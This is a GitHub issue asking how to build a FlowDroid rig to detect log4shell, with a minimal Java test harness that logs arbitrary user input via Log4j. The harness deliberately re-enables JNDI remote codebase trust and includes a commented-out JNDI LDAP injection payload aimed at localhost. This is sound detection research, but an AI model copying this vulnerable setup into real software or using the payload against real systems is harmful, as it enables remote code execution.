Skip to content

log4shell setup? #416

Open
Open
@chadbrewbaker

Description

@chadbrewbaker

I wanted to get a FlowDroid rig to detect the log4shell exploit - any tips?

This could would be the minimum test rig? It takes an arbitrary string from the command line.

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class log4j {
    private static final Logger logger = LogManager.getLogger(log4j.class);
    public static void main(String[] args) {
        //高版本的jdk默认trustURLCodebase为false,因此不能成功利用JNDI注入
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");
      //  logger.error("${jndi:ldap://127.0.0.1:1389/Exploit}");
      logger.error(args[1]);
    }
}     

Metadata

Metadata

Assignees

No one assigned

    Labels

    questionFurther information is requested

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions